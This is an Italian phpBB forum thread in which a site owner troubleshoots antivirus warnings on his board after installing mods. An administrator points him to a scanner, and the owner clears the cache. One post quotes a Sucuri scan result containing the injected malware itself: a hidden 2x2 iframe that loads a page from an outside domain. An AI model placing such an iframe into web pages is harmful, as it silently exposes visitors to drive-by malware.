Problema MOD barra reg ospiti 2 (credo) e antivirus..

Area dedicata al phpBB 3.0.X
Rispondi
Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 25/03/2013, 7:07

Resto allibito di fronte a questi sconcertanti eventi !!
Ho installato la mod "barra registrazione ospiti 2" e per due giorni tutto ok...
Poco fa' mi alzo apro la mi apagina del forum e SORPRESAAA :

Warning

In order not to compromise your security, this page will not be accessed
A virus or unwanted program was found in the HTTP data of the requested page.

Requested URL: http://prvfabio.altervista.org/forum/index.php?sid=50c32ba448eaeb2cdaf1c6c0077dc96a
Information: Contains recognition pattern of the HTML/TwitScroll.B HTML script virus
Need some help with this warning? Click here to ask an Expert.


Avira blocca la mia pagina???
E mi sembra di capire che il problema sia la mod reg. ospiti.....
Ora non so' se solo con questo antivirus...
Ma chi viene vede una cosa del genere sai come scappa via....
Ma che faccio?
La tolgo...non la tolgo...ce n'e' una simile......cambio antivirus???
Magari e' qualche altra cosa....ma l'ultima cosa installata e' quella mod..
Che poi non sono nemmeno sicuro che sia quella mod....
Comunque se lo fa' con me ha problemi anche chi l'hainstallata oltre me.
Magari non tanto per se steso (magari ha un altro antivirus) ma per gli ospiti che vanno a visitargli il forum...
Consigli??
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 25/03/2013, 7:19

Allora:
CONFERMO che si tratta di quella mod.
E che sia AVIRA che KASPERSKY bloccano l'accesso alla pagina.

Mi spiace perche' era proprio carina...
Se ne conoscete altre mi date un link?
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Avatar utente
Dr.House
Amministratore
Amministratore
Connesso: No
Messaggi: 2179
Iscritto il: 08/01/2012, 8:24
Versione phpBB3: 3.2.5
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum: www.phpbb-store.it
Località: Reggio Calabria
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da Dr.House » 25/03/2013, 9:14

mi pare strano ma ad ogni buon conto tutto è possibile.
Prima di disinstallare la mod fai una scansione al tuo sito:
http://sitecheck.sucuri.net/scanner/

Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 25/03/2013, 10:15

L'ho tolta perche' ho 2 computer a casa mia. Sono entrato dall'altro computer e kaspersky mi bloccava la pagina. Poi siccome comunque e' facile da rimettere l'ho tolta e adesso entro senza problemi.
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 25/03/2013, 11:22

A distanza di mezz'ora l'antivirus mi dice di nuovo che la pagina infetta. Hai ragione ho fatta la scanzione e risulta che c'e' un virus....
Known javascript malware.
Details: http://labs.sucuri.net/db/malware/mwjs-iframe-injected691?v3
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reviewsandbonuscentral.com/zvnv.html?i=2387630></iframe></body>


Ma e' la barra per la condivisione mi pare...
Che faccio?
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 25/03/2013, 11:58

Ho disinstallato anche la mod per condividere sui social network...

Il problema sembra sparire..ma appena rifaccio il login....torna...
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 25/03/2013, 12:09

Lo so che sto a fa' un casino con questi messaggi a raffica...ma qui me tocca rifa' il forum appena finito dopo un mese di lavoro... Perdonatemi.
Vi tengo informati ogni novita' che "capisco"...
Adesso lo fa' soltanto quando accedo al pannello di amministrazione...
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 25/03/2013, 12:33

Ho pulito la cache e visto che non appariva piu' il problema..ho reinstallato le 2 mod.
Sembra tutto ok...ma se vado sul sito http://sitecheck.sucuri.net/scanner/ e li mi dice che il mio sito e' ancora infetto..
Pero' per almeno una decina di minuti a questa parte mi fa' entrare senza problemi...
Spero tanto che resti cosi...
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 26/03/2013, 6:07

Tutto ieri tutto bene, c'ho lavorato tutto il giorno non ha mai dato problemi.
Adesso mi ribloccava le pagine.
Ho provato a SVUOTARE LA CACHE ed e' tornato tutto a posto.
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Avatar utente
likerenegade
Trusted
Trusted
Connesso: No
Messaggi: 76
Iscritto il: 10/03/2013, 13:33
Versione phpBB3: 3.0.11
Stile utilizzato: Prosilver
Versione SEO: NO
Mod / Estensioni installate: Si
Link del Forum:
Località: Rieti
Contatta:

Re: Problema MOD barra reg ospiti 2 (credo) e antivirus..

Messaggio da likerenegade » 26/03/2013, 8:54

Il mio problema riguarda credo alcuni "diritti"....per i giochi flash che ho messo nel mio forum.... Ma il problema del vostro "post reply" rimane...
<<< SCHEDA MADRE: Asus P8H61
PROCESSORE: DualCore Intel Core i3-2100, 3200 MHz
SCHEDA VIDEO:NVIDIA Ge Force GTX 750 Ti
MEMORIA:4 giga di ram DDR3 >>>

Rispondi